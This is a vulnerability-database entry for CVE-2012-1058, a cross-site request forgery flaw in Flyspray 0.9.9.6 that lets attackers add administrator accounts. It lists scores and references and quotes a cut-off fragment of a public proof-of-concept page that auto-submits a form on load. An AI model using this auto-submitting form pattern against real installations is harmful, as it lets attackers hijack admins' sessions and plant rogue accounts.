Recent Vulnerabilities Research Posts Trends Blog About Contact

Published: 14/02/2012 Updated: 29/08/2017

CVSS v2 Base Score: 6 | Impact Score: 6.4 | Exploitability Score: 6.8

VMScore: 605

Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P

Cross-site request forgery (CSRF) vulnerability in Flyspray 0.9.9.6 allows remote malicious users to hijack the authentication of admins for requests that add admin accounts via an admin.newuser action to index.php.

Vulnerable Product	Search on Vulmon	Subscribe to Product
flyspray flyspray 0.9.9.6

#Exploit Title: Flyspray 0996 CSRF Vulnerability #Date: 06 Feb 2012 #Author: Vaibhav Gupta #Software Link: flysprayorg/flyspray-0996zip #Version: 0996 +---+[CSRF Add Admin Account after authentication]+---+ <html> <body onload="javascript:documentforms[0]submit()"> <H2>CSRF Exploit to add ADMIN account</H2&g ...

CWE-352 http://www.exploit-db.com/exploits/18468 http://packetstormsecurity.org/files/109507/Flyspray-0.9.9.6-Cross-Site-Request-Forgery.html http://osvdb.org/78923 http://secunia.com/advisories/47881 https://exchange.xforce.ibmcloud.com/vulnerabilities/73051 https://nvd.nist.gov https://www.exploit-db.com/exploits/18468/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2012-1058

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect